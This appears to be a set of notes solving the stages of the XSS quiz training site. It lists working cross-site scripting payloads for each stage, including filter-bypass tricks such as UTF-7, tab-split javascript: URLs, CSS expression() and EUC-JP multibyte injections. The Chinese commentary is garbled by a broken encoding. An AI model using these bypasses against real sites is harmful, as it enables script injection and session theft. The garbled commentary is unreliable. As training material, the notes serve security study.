http://xss-quiz.int21h.jp
һأ<img onerror="alert(document.domain);" src=>
ڶأ"><script>alert(document.domain);</script>

أ
http://xss-quiz.int21h.jp/stage-3.php?sid=93de7707279b3a5ae4ce419bfc7c0b1f380a20f6
ʾThe input in text box is properly escaped
Ͳ⴦


Ĺأ
http://xss-quiz.int21h.jp/stage_4.php?sid=a311bc75ede604bb9d9d1cf566117401218f789c
hiddeninput㣺" onmouseover="alert(document.domain);" type="text ⲻ:(
"><script>alert(document.domain);</script> 

أ
http://xss-quiz.int21h.jp/stage--5.php?sid=646d0cc8a8f21e2e32b36910462f1fcf8513a60d
" onmouseover="alert(document.domain);" type="textУtamper dataƹͻ˳ơ

أ
http://xss-quiz.int21h.jp/stage-no6.php?sid=521453f94fdb4c3e538b27cca9f1cc771edc0b1a
" onmouseover="alert(document.domain);" x="һ

߹أ
http://xss-quiz.int21h.jp/stage07.php?sid=fc33ef87ee482ad559e828f80803a9645ea2cc19
1 onmouseover=alert(document.domain);˱䷨е˼

ڰ˹أ
http://xss-quiz.int21h.jp/stage008.php?sid=b2d11d0122ac031aefde2490f623af51c6dc4af4
javascript:alert(document.domain); //jsαЭ

ھŹأ
http://xss-quiz.int21h.jp/stage_09.php?sid=5b3848609d2b7d7eaa76b3c2fe1107b4e027f441
+ACI- onmouseover=+ACI-alert(document.domain)+ADsAIg- x=+ACI-
utf-7
ʵʲԣ+Ϊ%2b
p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=euc-jp

ʮأ
http://xss-quiz.int21h.jp/stage00010.php?sid=ebbdd5208bce92c3c26c5da4e79c3a0086f16d5e
ʾs/domain//g; 
" onmouseover=alert(document.domdomainain); x="

ʮһأ
http://xss-quiz.int21h.jp/stage11th.php?sid=2ea843cedd78f5b9dfd684cc00be42481f72449c
ʾ"s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;" 
"><iframe src="javascr&#09;ipt:alert(document.domain);"></iframe>ǿԵģûһء
"><a href="javascr&#09;ipt:alert(document.domain);">12</a>һء

ʮأ
http://xss-quiz.int21h.jp/stage_no012.php?sid=62c192a540aba87e7b6796ce0cbc2cd93fcb0750
ʾ"s/[\x00-\x20\<\>\"\']//g;" 
``onmouseover=alert(document.domain);һء

ʮأ
http://xss-quiz.int21h.jp/stage13_0.php?sid=00696ab8c69d8a146bc35d5e65b6a7c270eaf1f0
background-color:#f00;background:url("javascript:alert(document.domain);");

ʮĹأ
http://xss-quiz.int21h.jp/stage-_-14.php?sid=7188bd9374f7397e0a67044cfcf721c6be036b83
ʾs/(url|script|eval|expression)/xxx/ig
cos:expres/**/sion(if(!window.x){alert(document.domain);window.x=1;})

ʮأ
http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726
ʾdocument.write(); 
\x3cscript\x3ealert(document.domain);\x3c/script\x3e

ʮأ
http://xss-quiz.int21h.jp/stage00000016.php?sid=f4aed769ab48312e8815f3b63f32e2984a4ebb88
ʾ"document.write();" and "s/\\x/\\\\x/ig;" 
\u003cscript\u003ealert(document.domain);\u003c/script\u003e
ʮҲԡ\74script\76

ʮ߹أ
http://xss-quiz.int21h.jp/stage-No17.php?sid=86908f4e2c28923d9280baebd67f4d9f009b5fa5
ʾmulti-byte character
euc-jpı뷶Χ
byte 18Er, 2 bytea, byte 2A1-DF
byte 1A1-FEr, 2 bytea, byte 2A1-FE
byte 18Fr3 bytea, byte 2cbyte 3A1-FE
Ԫضύ%A7պ˫ţ鿴ԴɹˣΪʲôUIȥûɹֱڵַjavascript:alert(document.domain);
ڷԭ汾⣬IE8˹
p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

ʮ˹أ
http://xss-quiz.int21h.jp/stage__No18.php?sid=e9cd87a31a1b373f6283b698f3762758db319f2b
ʾus-ascii high bit issue 
41-5A, 61-7A (c̖t21-7E)
ͬIE8Щ©ѾIE8޲ˡ
p1=%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE









